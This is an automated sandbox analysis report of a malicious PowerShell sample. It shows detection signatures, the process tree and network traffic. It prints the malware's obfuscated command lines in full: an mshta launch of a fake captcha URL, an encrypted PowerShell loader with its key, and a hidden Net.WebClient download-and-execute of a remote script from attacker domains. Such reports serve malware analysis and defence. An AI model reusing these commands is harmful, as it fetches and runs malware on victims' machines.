
Windows Analysis Report
1.ps1

Overview

General Information

Sample name: 1.ps1
Analysis ID: 1582960
MD5: 1ca2c37d699c31038a935df80666343b
SHA1: 845e2fc0ff86d9e1b40f6d3536a636fdeaa4a3d4
SHA256: be8ec04111bf65a104b306bc679f9c467e7bbe1723bb8eeaa23be1d0ba84c6dd
Tags: ps1, user-zhuzhu0009

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Bypasses PowerShell execution policy
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7584 cmdline: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn…oNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8128 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7772; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0x43b4f:$b1: ::WriteAllBytes(
  • 0x446c1:$b1: ::WriteAllBytes(
  • 0x1af8:$s1: -join
  • 0x302e:$s1: -join
  • 0x43e5:$s1: -join
  • 0x1c6d6:$s1: -join
  • 0x43c03:$s1: -join
  • 0x44775:$s1: -join
  • 0x587e9:$s1: -join
  • 0x763c4:$s1: -join
  • 0x793ea:$s1: -join
  • 0x8346f:$s1: -join
  • 0x85610:$s1: -join
  • 0x8622a:$s1: -join
  • 0xa1638:$s1: -join
  • 0xa29ea:$s1: -join
  • 0xa3fa1:$s1: -join
  • 0xdb6dc:$s1: -join
  • 0xdbe88:$s1: -join
  • 0xe3bbf:$s1: -join
  • 0xe5004:$s1: -join

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d, CommandLine: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d, ProcessId: 7584, ProcessName: mshta.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn…
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", ProcessId: 7432, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, 
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn…
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1", ProcessId: 7432, ProcessName: powershell.exe
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn…
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7696, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: https://deduhko.klipzyroloo.shop; Avira URL Cloud: Label: malware
Source: http://deduhko.klipzyroloo.shop; Avira URL Cloud: Label: malware
Source: https://deduhko.klipzyroloo.shop/mazkk.eml; Avira URL Cloud: Label: malware
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 96.0% probability
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.144.62:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+ source: powershell.exe, 00000006.00000002.2214556917.0000000006C9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb7 source: powershell.exe, 00000006.00000002.2214673362.0000000006CD3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbpV source: powershell.exe, 00000006.00000002.2182040392.00000000007B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb) source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb. source: powershell.exe, 00000006.00000002.2213256401.0000000006C10000.00000004.00000020.00020000.00000000.sdmp
Source: global traffic; HTTP traffic detected:
    GET /mazkk.eml HTTP/1.1
    Host: deduhko.klipzyroloo.shop
    Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected:
    GET /awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: solve.vwglq.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /Poket.mp4 HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: deduhko2.kliphuwatey.shop
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: solve.vwglq.com
Source: global traffic; DNS traffic detected: DNS query: deduhko2.kliphuwatey.shop
Source: global traffic; DNS traffic detected: DNS query: deduhko.klipzyroloo.shop
Source: powershell.exe, 00000006.00000002.2182040392.000000000086A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoftvu
Source: svchost.exe, 00000003.00000002.2901323035.0000026275800000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000006.00000002.2183959871.0000000004A70000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://deduhko.klipzyroloo.shop
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A28000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A28000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A28000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A5D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1667002839.0000018B8009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1667002839.0000018B80023000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000000.00000002.1667002839.0000018B8006B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2214673362.0000000006CA6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://deduhko.kl
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://deduhko.klipzyroloo.shop
Source: powershell.exe, 00000006.00000002.2182040392.0000000000780000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://deduhko.klipzyroloo.shop/mazkk.eml
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://deduhko2.kliphuwatey.shop/
Source: mshta.exe, 00000002.00000003.1888626567.000001F822FF6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4
Source: mshta.exe, 00000002.00000003.1877520508.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1877800975.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1895973024.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4...
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4...s
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 
00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4/
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 
